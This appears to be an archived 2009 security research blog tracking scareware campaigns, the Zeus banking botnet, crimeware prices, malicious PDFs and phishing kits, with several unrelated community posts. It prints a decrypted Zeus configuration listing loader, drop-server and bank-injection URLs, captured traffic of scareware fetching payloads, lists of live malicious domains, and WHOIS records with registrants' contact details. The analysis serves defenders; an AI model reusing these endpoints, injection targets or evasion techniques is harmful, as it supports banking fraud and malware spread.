Tuesday, March 31, 2009

MALWARE INFECTION THROUGH FALSE WINDOWS SECURITY CENTER

MALWARE INFECTION THROUGH FALSE WINDOWS SECURITY CENTER

The Windows Security Center or Action Center is a component included with Microsoft's Windows XP (beginning with Service Pack 2), Windows Vista and Windows 7 operating systems that provides users with the ability to view the status of computer security settings and services. Windows Security Center also continually monitors these security settings, and informs the user via a pop-up notification balloon if there is a problem. It is renamed to Action Center in Windows 7, where it covers maintenance as well as security

But here it used to show the false scan alerts& It is spreading
Winwebsec family Trojans



When the user first accesses a malicious page, It is generating fake virus alert


And it asking to install the rogue system security 2009


After Infected



More on Install.exe http://www.virustotal.com/analisis/cb066f00f4dccdd3f24f5f888843aee5

WHOIS INFORMATION:

Domain name: itsecurityscan.com

Name servers:
ns1.itsecurityscan.com
ns2.itsecurityscan.com

Registrar: Regtime Ltd.
Creation date: 2009-03-25
Expiration date: 2010-03-25

Registrant:
Jayme Millwood
Email: millwoodjaymemichael@gmail.com
Organization: Private person
Address: 1892 C Street
City: Pawtucket
State: MA
ZIP: 02860
Country: US
Phone: +1.5083997660


***** Thanks to Kalyan for his analysis *****

ARE YOU INTERESTED ON PROTECTED VIDEO CONTENS? DON’T GET INFECTED

ARE YOU INTERESTED ON PROTECTED VIDEO CONTENS? DON’T GET INFECT

Protected private content videos are spreading malware. The web site is looking like original movie website. If you want to see the the protected content, you have to click the ‘ENABLE VIDEO NOW’. After clicking the link you are ready to get infect the malware



If you need to open the video, you need secure code & access code





Where can I get the code? .Click the access generator. It will generate the code& simultaneously Drop the trojan.AntiVir is detecting as TR/Dropper.Gen, McAfee-GW-Edition is detecting as Trojan.Dropper.Gen

Additional information:

File size: 88576 bytes
MD5...: 37d63ad95eae5b2810b9b860dcb03ba6

TrID..: File type identification
Win32 Executable Generic (42.3%)
Win32 Dynamic Link Library (generic) (37.6%)
Generic Win/DOS Executable (9.9%)
DOS Executable Generic (9.9%)
Autodesk FLIC Image File (extensions: flc, fli, cel) (0.0%)

PEInfo: PE Structure information

Base Data
entrypointaddress.: 0x2214
timedatestamp.....: 0x49cfb31d (Sun Mar 29 17:42:53 2009)
machinetype.......: 0x14c (I386)

Imports

kernel32.dll: ExitProcess, FreeLibrary, GetModuleHandleA, GetProcAddress, LoadLibraryA, lstrcatA, lstrcpyA, lstrlenA

More ananlysis:http://www.virustotal.com/analisis/e65ba59b29da0592d47c871d3261d48e

WHOIS INFORMATION:

Registration Service Provided By: REGNAME.BIZ
Contact: +1.2014674681
Website: http://www.regname.biz

Domain Name: CUTMYHEART.COM

Registrant:
N/A
Karlos ()
Mira str 144 app. 12
Moscow
Moskovskaya oblast,987458
RU
Tel. +495.7639012

Creation Date: 27-Jul-2008
Expiration Date: 27-Jul-2009

Domain servers in listed order:
ns2.rusparters.com
ns1.rusparters.com

Status:ACTIVE

*********THANKS to our Team Lead Kalyan on his analysis **********

Monday, March 30, 2009

Financial institutions targeted by the botnet Zeus. Part two

The structure consists of Zeus in php modules from which it controls and executes all the fraudulent and harmful for which it was conceived. For example, it is very common to find files of type s.php, sS.php, x.php or similar which would command control (C & C) of the bot.

Once infected, Zeus download an encrypted file type. Bin (usually cfg.bin) which is the file that specifies the configuration with a set of instructions that indicate the type of information to be collected and where to send.

When this file is decrypted, we can see shaping and financial institutions which carry out constant monitoring Zeus from the zombie.

In this way, when the user accesses certain forms Zeus intercepts the browser interaction in capturing all the information you need to realize their botmaster fraud.

The list of entities that are in the sights of Zeus is really long, but some of them are:

myspace.com
gruposantander.es
vr-networld-ebanking.de
finanzportal.fiducia.de
bankofamerica.com
bbva.es
bancaja.es
olb2.nationet.com
online.lloydstsb.co.uk
pastornetempresas.bancopastor.es
bancopopular.es
ebay.com
us.hsbc.com
e-gold.com
online.wellsfargo.com
wellsfargo.com
paypal.com
usbank.com
citizensbankonline.com
onlinebanking.nationalcity.com
suntrust.com
53.com
web.da-us.citibank.com
bancaonline.openbank.es
extranet.banesto.es
empresas.gruposantander.es
bbvanetoffice.com
bancajaproximaempresas.com
citibank.de
probanking.procreditbank.bg
ibank.internationalbanking.barclays.com
online-offshore.lloydstsb.com
dab-bank.com
hsbc.co.uk
bancoherrero.com
intelvia.cajamurcia.es
caixasabadell.net
areasegura.banif.es
privati.internetbanking.bancaintesa.it
iwbank.it
cardsonline-consumer.com
money.yandex.ru
e-gold.com
paypal.com

These strategies represent malicious threats and make it clear that while email is still a channel used for the propagation of malware today is who works as an Internet-based attacks through various mass crimeware.

Related Information
Financial institutions targeted by the botnet Zeus. Part one - Spanish version
Zeus botnet. Mass propagation of trojan. Part two - Spanish version
Zeus botnet. Mass propagation of trojan. Part one - Spanish version


Saturday, March 28, 2009

Financial institutions targeted by the botnet Zeus. Part one

As I said in previous post, zeus is one of the networks of zombie computers more important because of the large number of nodes that make up your network, and although its origin dates back to late 2007, now malware is exploiting a active and massive, expanding its coverage of attacks and fraudulent activities, each managed node through a web interface.

So much so that its activities are, in addition to the malicious action of infection, activate a whole array of malicious scripts whose purposes are channeled into massive infection of computers through trojans exploit various known vulnerabilities, phishing attacks under the method of cloning sites of different banks and global systems that offer online payments.

Knowing this fundamental point of view to focusing zeus in a high percentage of data theft, we assume that the specific question after reading these short paragraphs is: how does zeus get the information you need equipment victim?

The answer to this mystery lies in its configuration file, which is encrypted. Once decrypted, the contents of this configuration file is similar to the following real life example that shows the information contained in the file cfg.bin (MD5: 905dfab98b33e750bf78c8b29765279b):
Config version: 1.0.3.7
Loader url: http://yourcatfree.cn/trashes/ldr.exe
Server url: http://theyourbest.cn/rssfeederd/stat1.php
Advanced config 1: http://greatyourway.cn/trashesgg2/cfg.bin
Advanced config 2: http://theyourown.cn/trashesff1/cfg.bin
Advanced config 3: http://adviceswarning.com/trashesrr5/cfg.bin
Advanced config 4: http://ispspartners.com/trashes6/cfg.bin
Advanced config 5: http://ispscenter.com/trashesrr3/cfg.bin
Advanced config 6: http://alleips.com/trashestt3/cfg.bin
Fake 1: 0 PG http://adultfriendfinder.com/go*|http://centralet.cn/1/1.php|291351|
Fake 2: 0 PG http://adultfriendfinder.com/search/g*|http://centralet.c
/1/1.php|291351|
Fake 3: 0 PG http://adultfriendfinder.com/search/p*|http://centralet.cn/1/1.php|291351|
Fake 4: 0 PG http://adultfriendfinder.com/cgi-bin/public/page.cgi?p=affiliate_multi*|http://centralet.cn/1/1.php|291351|
Fake 5: 0 PG http://staging.adultfriendfinder.com/search/g*|http://centralet.cn/1/1.php|291351|
Fake 6: 0 PG http://staging.adultfriendfinder.com/search/p*|http://centralet.cn/1/1.php|291351|
Fake 7: 0 PG http://www.adultfriendfinder.com/go*|http://centralet.cn/1/1.php|291351|
Fake 8: 0 PG http://www.adultfriendfinder.com/search/g*|http://centralet.cn/1/1.php|291351|
Fake 9: 0 PG http://www.adultfriendfinder.com/search/p*|http://centralet.cn/1/1.php|291351|
Fake 10: 0 PG http://www.adultfriendfinder.com/cgi-bin/public/page.cgi?p=affiliate_multi*|http://centralet.cn/1/1.php|291351|
Fake 11: 0 PG http://www.staging.adultfriendfinder.com/search/g*|http://centralet.cn/1/1.php|291351|
Fake 12: 0 PG http://www.staging.adultfriendfinder.com/search/p*|http://centralet.cn/1/1.php|291351|
Inject data 1: OK
Inject data 2: OK
Inject data 3: OK
Inject data 4: OK
Inject data 5: OK
Inject data 6: OK
Inject data 7: OK
Inject data 8: OK
Inject 1: https://www.e-gold.com/acct/balance.asp*|GPL|*|*
Inject 2: https://online.wellsfargo.com/das/cgi-bin/session.cgi*|GL|*|*
Inject 3: https://www.wellsfargo.com/*|G|*|*
Inject 4: https://online.wellsfargo.com/login*|GP|*|*
Inject 5: https://online.wellsfargo.com/signon*|GP|*|*
Inject 6: https://www.paypal.com/*/webscr?cmd=_account|GL|*|*
Inject 7: https://www.paypal.com/*/webscr?cmd=_login-done*|GL|*|*
Inject 8: https://www.gruposantander.es/bog/sbi*?ptns=acceso*|GP|*|*
Done!

In this way, and through the advanced configurations that exploit the victim computer, the trojan zeus obtain sensitive information.


# Jorge Mieres

Thursday, March 26, 2009

Automating processes anti-analysis through of crimeware

The automation of malicious code is a life philosophy and a business round its creators as every day should focus their efforts on devising new "tools" that can "jump" detection methods proposed by the antivirus signatures.

Constantly appear new "proposals", increasingly professionalized, which help to delay the detection of malicious code through techniques anti-analysis and at the same time increase the profits of developers.

Polymorphic Cryptor Crum is one of many programs that are part of this category. It's a program used to encrypt malware environments; development in Russia for people who are on the mischievous side of the field to broaden the horizon of returns.


This is a new version of this crypter, just 1.1, which offers capabilities for handling polymorphic malicious code.

Among the features proposed by the polymorphic implementation are also of the same polymorphism:
  • Using random
  • Figures for imports and resources
  • 128 for each section
  • Overwriting the "Rich" and "Time / Date Stamp" on the header files
  • Provides capabilities anti-debugger
  • Avoid having to conduct a memory dump
  • Avoid performance in controlled environments
  • Change or delete the icon for the malicious binary
Here you will meet some of the functionality offered by the program, but sufficient to determine the degree of professionalism and hazardousness reached, in this case by Russian developers, the creation of malware is disturbing.

This implementation costs USD 100 on the black market. However, to complete the array of applications of this style, the same creator offers "only" a USD 50 joiner (used merging files) called Crum Joiner Polymorphic and USD 20 accessing updates same.

The interface of this program, which allows to merge several files such as a .jpg merge a binary .exe, is as follows:

In this case, some of the features that includes the application are:
  • Capacities polymorphic
  • Allows unlimited union files
  • Supports multiple file extensions like .doc, .mp3, .avi, .jpg, .bmp and .exe
  • File encryption of 256 bytes
  • Ability to carry not only files .exe files but also .dll
In both cases, the creator recommends certain "security measures" to protect the "integrity" of development as the application does not refer to services such as VirusTotal, be ordered to encrypt the files and not sharing any of the components that constitute the applications.

Related Information
Russian prices of crimeware - Spanish version

Creating Online polymorphic malware based PoisonIvy - Spanish version

# Jorge Mieres

Sunday, March 22, 2009

Campaign scareware infection through false Windows Explorer

The strategies of deception are the main feature that uses the scareware to generate fear in the user and ensure the implementation of your installer. While the excuses that are used for deception are numerous, some more appealing than others, each time is more of an increase in efforts to devise strategies and create more sophisticated.

In this case, deception is focused on presenting a line of scanning equipment that always ends by finding problems of infection, providing the download of the alleged security tool which will solve the problems. All completely false.

When the user first accesses a malicious page, an alert warns about the potential possibility that our team has been the victim of malicious code.

At this time there is a simulation of scanning equipment that is represented by a fake windows explorer and an animated gif that shows the progress bar indicating the progress of the scan, then display a popup window with the nomenclature of alleged threats found in the system.

This image, which offers two options ( "Remove all" and "Cancel") is another layer of deceit, because no matter what sector of the image is clicked, it produces the same effect: download the installer of malware. A file called install.exe md5 which is 8eed59709de00e8862d6ce3d5e19cb4a.

Some of the web addresses that are actively exploiting this malicious activity include:

stabilityaudit.com (209.44.126.22)
websscan.com
goscanbay.com (78.159.101.27)

goanyscan.com
goscanever.com
goscanfuse.com

goscanit.com

goscanonly.com

goscanslot.com

gowayscan.com

in4co.com

in4ik.com

megascan4.com

www.goscanonly.com

www.homescan4.com

easywinscanner17.com (209.249.222.48)

fast-antimalware-scanner.com (194.165.4.7)

fastantimalwarescan.com (78.47.91.153)

However, professionals seeking to refine its creators will try to cover as much of the "public" as possible by deploying a strategy of infection in several languages.

Even downloading malware variants thereof. In this way, the creators of scareware trying to fill the two languages most commonly used worldwide as are English and Spanish.

Spanish version

# Jorge Mieres

Friday, March 20, 2009

uCon 2009 Materials/Archives

For those of you who were unable to attend to uCon 2009, speaker
presentations from this year's event have been made available online.

Materials can be found at http://www.ucon-conference.org/archives.php.

We also would like to thank all of you who joined us at the conference
and helped us make uCon a blast.

- EF

Security Research: Is it really worth?

Big organizations are copying open security research and selling it to their customers openly. This is not something to accuse about, but it is more of a shame to our community.

http://blog.trendmicro.com/waledac-spamming-madness/ is/was released on March 20th 2009. We had this research released on March 15th, 2009 [that can be found at: http://evilfingers.blogspot.com/2009/03/pharmacy-spam-strikes-google.html]. Though we were not addressed once again.

Its a SHAME to our community that such big organizations take open research publications and convert it to their own work.

- EF

How security research really works?

Panda security has been publishing blog from what EvilFingers blog has released before them by a minimum of 24 hrs or so.

The following samples show, how Panda Security has taken an existing content, modified the text and never addressed a single word about EvilFingers. Guess this is what "Research" is all about:

http://pandalabs.pandasecurity.com/archive/Have-you-ever-heard-the-term-_2200_Rickrolling_22003F00_-Malware-distributors-have_2E002E002E00_.aspx


http://pandalabs.pandasecurity.com/archive/Metatags-in-malware-websites.aspx


http://pandalabs.pandasecurity.com/archive/Metatags-in-malware-websites_3A00_-II-part.aspx


http://pandalabs.pandasecurity.com/archive/Waledac-Storm-worm_2E002E002E00_-New-Target_3A00_-Valentine_1920_s-day.aspx

http://pandalabs.pandasecurity.com/archive/Happy-Saint-Valentine_2100_.aspx

We sent an email to legal team of Panda Security, but never got a single response.

SANS published a statement that their ISC reader found something: http://isc.sans.org/diary.html?storyid=5917

The ISC reader did not address about EvilFingers is where he found the source of the document about Oscar going wild. Hence, our members wrote comments stating that this could be found in EvilFingers Blog at the appropriate link. But SANS administrator who needs to moderate the comments, denied the comment that had the true source of this blog.

If you really need money out of free security research done by the open world, at least address the people who really deserve the credit. All that the researchers require around the world is recognition to their work. If you steal that research and convert into your discovery, does it show a moral from your end.

Thanks to our security researcher Kalyan, who found these links and contacted SANS to publish the true source or such research.

Contact us if you have any questions: contact.fingers @ gmail.com

- Anushree

Thursday, March 19, 2009

Syscall Handler Checker [SHC]

Our 3rd Linux kernel rootkit analytics tool has released. This can be found in the following link:

http://www.rootkitanalytics.com/kernelland/syscall-handler-checker.php

- EF

Monday, March 16, 2009

HITB09 Agenda + Noteworthy Presentations

Agenda: http://conference.hitb.org/hitbsecconf2009dubai/agenda.htm

Keynote 1 - Philippe Langlois (Founder, Qualys / Intrinsec / TSTF)
"From Hacking, Startups to HackLabs: Global Perspective and New Fields"

Keynote 2 - Mark Curphey (Director CISG, Microsoft Corp)
"Security Cogs and Levers"

Other kick-ass presentations:

# Cross Domain Leakiness: Divulging Sensitive Information and Attacking
SSL Sessions - Chris Evans and Billy Rios

# VBootKit 2.0 - Attacking Windows 7 via Boot Sectors - Vipin & Nitin Kumar

# The Reverse Engineering Intermediate Language REIL and its
Applications - Sebastian Porst

# Pickpocketing mWallets: A Guide to Looting Mobile Financial Services -
The Grugq

# Psychotronica: Exposure, Control, and Deceit - Nitesh Dhanjani

# NKill - The Internet Killboard - Anthony 'kugutsumen' Zboralski

This one is REALLY going to be big news - it's a new tool which gives
attackers the ability to discover interesting relationships between
seemingly unrelated hosts and companies and to pull vulnerable hosts for
a specific domain, company or even an entire country!

EvilFingers team:

If you would like to attend HITB, kindly send us an email at contact.fingers @ gmail.com, we would work out a special deal for your conference ticket. This also depends on what level of volunteering you have done and how long you have been with EF and so on. Kindly, contact for more details.

- EF

Evading Web XSS Filters through Word (Microsoft Office and Open Office) in Enterprise Web Applications

Abstract: This paper sheds light on the hyper linking issues observed during penetration testing of web based enterprise applications. This concept can be used to bypass standard XSS filters by creating a malicious Microsoft word document.

Author: Aditya K Sood

DOWNLOAD HERE

- EF

Sunday, March 15, 2009

Pharmacy spam strikes google

"Are You In Need Of The Cheapest Drugs"

A large percentage of spam arriving in inboxes belongs to the pharma spam categories. Taking advantage of the fact that there are a number of legitimate internet pharmacies that offer discount prices, they attempt to scam people who wish to avoid some of the legal restrictions on drug purchases for a number of reasons:
Some people may wish to find a lower cost source of medications. Most people in the US are aware that many expensive medications can be obtained in Canada at a lower cost, and they assume anything called "Canadian" is a bargain.

Some people are unable to obtain a prescription for a maintenance drug because they are not keeping physician appointments or undergoing necessary monitoring/testing.
Some people want drugs that physicians are unwilling to prescribe for them, such as narcotics or unnecessary antibiotics.

The all google redirected sites are Fake pharmacy sites.Pharmacy spams are normaly E-Mail spam.But this time it hits google document also.This Fake pharmacy sites are used by storm Trojan

Ex:hxxp://docs.google.com/Doc?id=dgc9grq7_2ck5mp3fc

This website abusing vista,mastercard,American express,JCB,dinercard,American express logos.

The spam email links are redirecting to xxx.cn.Looking the whois info.

pridewit.com = [219.152.120.12]
Domain Name : pridewit.com
PunnyCode : pridewit.com
Registrant
Organization : Song Jiacheng
Name : SongJiacheng
Address : Guangdong Shangshui
City : Shangshui
Province/State : Guangdong
Country : cn
Postal Code : 528133

eagerfree.com = [58.20.140.5 ]
Domain Name : eagerfree.com
PunnyCode : eagerfree.com
Registrant:
Organization : li chun hua
Name : li chun hua
Address : huang ming shan lu21
City : JZ
Province/State : LN
Country : CN
Postal Code : 161002

Most of the website are registered by Chinese

Google search Tags:

intitle:Are You In Need Of The Cheapest Drugs
intitle:Are You Looking For The Cheapest Medications


intitle:Special Offer: Revatio 20 mg from $0.97 per pill


Thanks to spamtrackers for more information on pharmacy spam
http://spamtrackers.eu/wiki/index.php?title=Canadian_Pharmacy


# Kalyan

Saturday, March 14, 2009

Rootkit Analytics: Finally, the day has come...

www.RootkitAnalytics.com released early this morning 4AM EST. In this release we have,
--> 2 Linux kernelland anti-rootkits
--> 1 Windows userland anti-rootkits

Other than the above tools, we have tried releasing few pages of introduction to kernelland and userland rootkits. More coming up in next release, stay tuned...

Snapshot of RootkitAnalytics...

Friday, March 13, 2009

Russian prices of crimeware

To see how many Russians domains created to spread malware, and the wide variety of applications designed from those lands to commit various types of crimes who seek to keep the most valuable commodity: information; imagine Russia as if it were something to the world Gibson describes in Neuromancer where old dark alleys are used for the illegal sale and rental of all types of programs designed to break the security protections.

Cyber-criminals and black market crimware seem to be the order of the day in Russia. So, I want to reflect some numbers that give an idea of what it may cost to prepare attacks across a large number of "resources" available, as would a mercenary, to the highest bidder.

Sploit25
It contains a different crimware to exploit vulnerabilities in Internet Explorer 6 and 7, and in PDF files. There is a Lite version with a value of U$S 1500 and U$S 2500 Pro version

Unique Sploits Pack
Another crimware containing several different exploits for vulnerabilities. Its value is U$S 600. U$S 100 is accessed and updated by U$S 50 to an encryption module.

Neon Exploit System
A set of exploits designed to exploit vulnerabilities in Microsoft platforms and applications for mass use. The value of this crimware is U$S 500.

XS[S]hkatulka
Set script designed to break passwords webmails through XSS. According to its creators, "this application is ideal to start earning money by providing services for the passwords of mail accounts". As a researcher of "Information Research" :-) Its value is U$S 110.

Cripta Zeus(a)
It's a service whose purpose is to encrypt the trojans zombie PC's that recruit the botnets to Zeus. The "Services" offered are:
  • Build individual crypts (your.exe) the first time: U$S 49
  • Build individual crypts (your.exe) encrypting every two hours: U$S 46
  • Build individual crypts (your.exe) encrypting every three hours: U$S 43

LeFiesta Pack
One of the best known crimware. Like other similar programs, is written in PHP and is used to exploit vulnerabilities through techniques such as Drive-by-Download, Scripting, etc.. It's now used by the botnet Zeus. The price of the latest version is U$S 1000.

YES Exploit System
Another crimware designed to exploit vulnerabilities to exploit and scripts. Its value is U$S 600.

PoisonIvy Polymorphic Online Builder
Crimware to generate variants of the trojan PoisonIvy online. Its value is U$S 500.

FriJoiner Small y Private
An application to merge executable files. Such applications are widely used by disseminators of malware to prevent the malicious code is detected. Small version costs U$S 10 and version Private U$S 15.



Genom iframer
Applications designed to automate the injection of iframe tags in vulnerable sites. Its value is U$S 40.

CRUM Cryptor Polymorphic
Crypt with polymorphic features designed to avoid detection of the malware from antivirus companies. Its cost of U$S 100.

This is just a small list that represents a very small percentage compared to the amount and variety of applications crimware.

The majority of attacks that use the Internet as a base for attacks carried out with programs of this style, but must be aware that while we are more informed and better use of security technologies, the greater the level of protection in our information environments.

Related Information
Unique Sploits Pack. Crimware para automatizar la explotación de vulnerabilidades
Phishing Kit. Creator automatic of fraudulent sites - Spanish version
Analysis of an attack of web-based malware - Spanish version
Creating Online polymorphic malware based PoisonIvy - Spanish version


# Jorge Mieres

Wednesday, March 11, 2009

Aggressive strategy of XP Police Antivirus infection. Second part

From the time that the infection of XP Police Antivirus, you will begin to display on screen a series of false alerts on emerging infections, among others.

But in a fully transparent manner, will produce a series of actions to complete the work of scareware. Through listening to the traffic, we see the unloading of the following components:
GET /setupc.dat HTTP/1.1
User-Agent: MS_Update32
Host: setupdatdownload.com

Download setup.dat isn't a data file but a compressed file that saves a copy of the other files that are uncompressed in C:\Program Files\XPPoliceAntivirus.
GET /sysupdate.exe HTTP/1.1
User-Agent: MS_Update32
Host: setupdatdownload.com

Download sysupdate.exe (MD5: 36e13b0624dbd4bc973d1fd5f949ebe0) which is used to compress the malware runtime try to avoid detection by antivirus programs.
GET /svchost32.exe HTTP/1.1
User-Agent: MS_Update32

Host: setupdatdownload.com


HTTP/1.1 200 OK

Server: nginx

Date: Sat, 28 Feb 2009 12:47:46 GMT

Content-Type: application/octet-stream

Last-Modified: Fri, 27 Feb 2009 16:01:17 GMT

Accept-Ranges: bytes

Content-Length: 2746314

Connection: Keep-Alive

Age: 0


MZ......................@...............................................!..L.!This program cannot be run in DOS
mode.


GET /land.txt HTTP/1.1

User-Agent: wget 3.0

Host: xp-police-09.com

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Sat, 28 Feb 2009 12:51:15 GMT

Content-Type: text/plain

Last-Modified: Mon, 02 Feb 2009 20:53:00 GMT

ETag: "3a58001-1-bd70a300"

Accept-Ranges: bytes

Content-Length: 1

Connection: Keep-Alive

Age: 0


2


GET /js/window.js HTTP/1.1

Accept: */*

Referer: http://www.xp-police-09.com/installed.php?id=108

Accept-Language: es

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: www.xp-police-09.com

Connection: Keep-Alive

Cookie: id=108

JavaScript windows.js displayed on screen pop-up window with the caption Thank you for Installation!


GET /buy.php?id=108 HTTP/1.1
Accept: */*
Accept-Language: es
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.xp-police-09.com
Connection: Keep-Alive
Cookie: id=108

This is the page to purchase the scareware from where sensitive information and financial requests of the victim. It's a scam/phishing.

The maneuvers used by malicious code are becoming more aggressive and effective in their actions because, as could be seen, the installer is downloaded in the first instance, is only part of the puzzle from which the other gets scareware pieces.

Related Information
Aggressive strategy of XP Police Antivirus infection
Campaign spreading XP Antivirus Police through Visual Social Engineering


# Jorge Mieres

Sunday, March 8, 2009

Exploitation of vulnerabilities through PDFs

Exploit weaknesses in certain applications for mass use, is today one of the attack vectors for malware more employees, and in this sense I have already posted the exploitation of vulnerabilities through several SWF and JS.

In this case, the attacker's goal is to find computers with Adobe Acrobat and Adobe Reader vulnerable to a Buffer Overflow attack, described in CVE-2008-2992.

The point is a concrete example is the direction http://prororo7.net/sp/index . php, the access to malicious URL, doesn't display anything, but in the background, the exploit code that exploited the bug in case of finding it.

In this example, it downloads and runs an arbitrary remote file through malware f.pdf (MD5: 2de9de23f9db1e7b1e39d0481a372399) util.printf function using Java Script.

The malicious code is manifested as the load.exe (MD5: a6e317f29966fa9e2025f29c7d414c0a) and is downloaded from http://prororo7 .net/sp/l .php?b=4&s=p.

Unfortunately, the pdf file is constantly manipulated by those who propagate it to avoid detection by the antivirus software, and why I say "unfortunately", because the detection rate of malicious pdf that has so far is extremely low. As we can see in the report that returns VirusTotal, only five (5) AV companies a total of 39 preventable infections.

A similar situation occurs with the file doc.pdf (MD5: 5fa343ebca2dd5a35b38644b81fe0485) that is called from http://toureg-cwo .ch/fta/index.php and download the file 1.exe (MD5: 5c581054fbce67688d2666ac18c7f540) whose detection rate is even lower than the previous (4/39).

There are many web addresses being used in an active way to spread malware:

tozxiqud .cn/nuc/spl/pdf .pdf
teirkmm .net/nuc/spl/pdf .pdf
hayboxiw .cn/nuc/spl/pdf .pdf
www.ffseik .com/nuc/spl/pdf .pdf
www.kuplon .biz/smun/pdf .php?id=2435&vis=1
www.geodll .biz/ar/spl/pdf.pdf
setcontrol .biz/ar/spl/pdf .pdf
newprogress .tv/fo/spl/pdf .pdf
eddii .ru/traffic/sploit1/getfile .php?f=pdf
google-analytics.pbtgr .ru/pdf .php?id=48462
hardmoviesporno .com/rf/exp/update1 .pdf


As you see, the chances of being victims of such strategies of infection is high and consequently, it's extremely important to patch as soon as possible, those who use the applications of Adobe.

Related Information
Exploiting vulnerabilities through SWF - Spanish version
Exploitation of vulnerabilities through JS - Spanish version


# Jorge Mieres

Friday, March 6, 2009

Aggressive strategy of XP Police Antivirus infection

After commenting on the campaign of social engineering visual used by the scareware Police XP Antivirus, we find an extra condiment also trying to exploit fully the social engineering in the natural features of the human factor.

The same domain from which you download the binary install.exe is used to disseminate another trojan, through a fake PornTube page; codec.exe (MD5: a90e8a945f5cce31db00cac14a26418c), also belonging to the family of Police XP Antivirus.

When the infected computer, the trojan makes shortcuts on the desktop of the user referring to the following websites to spread spam by:

Cheap Pharmacy Online >> http://www.quality-rx .com/?fid=1056
Cheap Software >> http://allisoftware .com
VIP Casino >> http://affiliate.goldvipclub .com/remote/SmartDownload.asp?affid=760
MP3 Download >> http://www. mp3sale .ru/?pid=507
SMS TRAP >> http://www.smstraper .com/go/MTEzOjA=/
Search Online >>http://www.adultwebfind .com/search .php?aid=16851&keyword=sex

When you open the shortcut VIP Casino download the executable SmartDownload.exe (MD5: 0f47f132f9e3d2790a6b27ffc2c502b0), and MP3 Download direct access to the http://xp-police-09 domain .com/lands/error/ from where one is deployed new strategy of deception by simulating an error.

After a few seconds, you begin to experience the pop-up windows to display alerts on suspected infections and applications to register the fake program.

However, until this instance, actions can be viewed by the victim, but still happening in the background of other actions that directly involve the downloading of the components of the scareware XP Police Antivirus.

Related Information
Campaign spreading XP Antivirus Police through Visual Social Engineering - Spanish version
New strategy of social engineering to spread IE Defender - Spanish version


# Jorge Mieres

Wednesday, March 4, 2009

Phishing Kit. Creator automatic of fraudulent sites

Cybercrime is on the agenda and crime put all their efforts on sophisticated and automate their criminal strategies to further fuel the whole network of criminals who are fueled by the profits at the expense of users.

One of the most common scams today are phishing attacks, where one of the methods normally used is the cloning sites of financial institutions and banks looking to get sensitive data through deception exposed on the weaknesses of the human factor.

However, the cloning site isn't always limited to a page similar to the real banks, but also can point your gun at popular sites and acquaintances as we saw in previous post.

Now the question is: how do you manage to automate the creation of fake pages?

Clearly, the answer round programs to create easy and simple as it belongs to the following interface.

These programs allow the cloning of a page with minimal effort which is embodied in the simple act of copying the source code of the real web, pass the program and make two clicks to get the fraudulent site, offering the possibility of "playing "the code and adapt it to seek benefits the attacker.

In this way to get the file structure that we mentioned days ago with the creation of a plain text file and login.php, getting results like this then spread through social engineering.

Very similar to a legitimate site where practically very difficult to detect deception for less experienced users in this type of criminal strategies.

On the other hand, this is a latent risk as this, to commit fraud in this style isn't limited to possess advanced knowledge of computers but just one person knows for copy and paste, using his fraudulent site within minutes.

Related Information
Phishing Kit In-the-Wild for cloning of web site, version 2 - Spanish version
Phishing Kit In-the-Wild for cloning of web site - Spanish version


# Jorge Mieres

Monday, March 2, 2009

Analysis of an attack of web-based malware

Abstract: Internet has become an ally platform of attack for malware creators, who through the use of different techniques such as Drive-by-Download, Drive-by-Update, scripting, exploit, among others, and combining them seek to recruit an army of computers that respond only to their malicious instructions.

These attacks, using the Internet as a basis for implementing a direct damaging loads on the victim, in parallel, almost instantaneous and transparent view of the less experienced users, has become a latent and dangerous risk of infection by the simple act of accessing a website.

The following document sets out a concrete example that uses the above actions to exploit and infect a victim, describing also several extra features that enhance the damage of malware.

Author: Jorge Mieres

Full article is available here.

Sunday, March 1, 2009

Economic Crash: Impact on Security Community

Well, the market has gone down just like any other industry and there has been lay-off and cutting prices left-and-right.

What about training industry?

Security training orgs are still charging the same. Is this practical for the current situation. They should try to realize that they could loose their market, due to:
* Lay off's.
* No salary raise this year at many companies nor Bonuses.
* Training expenses has been cut, due to this situation at many firms.
* Free training options are starting to spread.

What about products and services?

Does security firms reduce the price of services and products they provide. If they don't, they would loose a few customers or would not gain a few new ones. But if they do, would they compensate by cutting their analysts/engineers or quality of their services? Are the consumer products price going any lower to reach more people. Would home user's understand the importance of security over cost of purchasing a tool.

What about consultants?
Do consultants have open door the same as what they had in the previous years? Are they able to demand the same money for the work they do or have they gone down? Presumably, the answer is "yes" [to some extent], but it depends on the individual situation.

What about small and medium sized businesses?
Are small and medium sized orgs able to compete with the security issues they deal with on daily basis. Are they able to fund their team to secure their stuff[tools, products, work, data, etc.] to ensure continuous business.

There are more questions that requires answers. What other questions do you have? What answers do you get? Contact us [contact.fingers @ gmail.com] for any questions you have and we would help you find your answers...

- EF

Campaign spreading XP Antivirus Police through Visual Social Engineering

The strategies of deception through visual social engineering, as are the cases that simulates viewing videos online, and attempts to download malware under the guise of lack of necessary codec, have become rife and almost a rule This should take the user to escape from a potential infection.

On another occasion I counted how scareware IE Defender used a similar campaign to spread your installer using the same strategy of deception. This time, the turn of this technique is to exploit Police XP 2009.

All domains that involve campaign directed to http://sexybabes18 .com/ video/ in the IP address 84.243.197.10. In this instance, you download a binary file called install.exe (MD5: 6ba25f5f8ed91db92305f92beef1fe84) from the XP Police 2009 website.

By accessing the website scareware that uses IP addresses 213.163.65.10, 213.163.65.10 and 206.125.44.28, we can verify that the file you downloaded is the same.

The domains are currently operated by XP Police 2009:

xp-police-09 .com
xp-police-antivirus .com
xp-police-engine .com
xp-police .com
xp-police-2009 .com
xp-police-av .com
mail.xp-police-antivirus .com
ns1.xp-police .com
ns2.xp-police .com
ns3.xp-police .com
ns4.xp-police .com
www.xp-police-09 .com
www.xp-police-antivirus .com
www.xp-police-av .com
www.xp-police-engine .com


This attack technique is actively used by scareware one of many that exist, so it might look more fake security programs using this strategy.

Related Information
New strategy of social engineering to spread IE Defender - Spanish version


# Jorge Mieres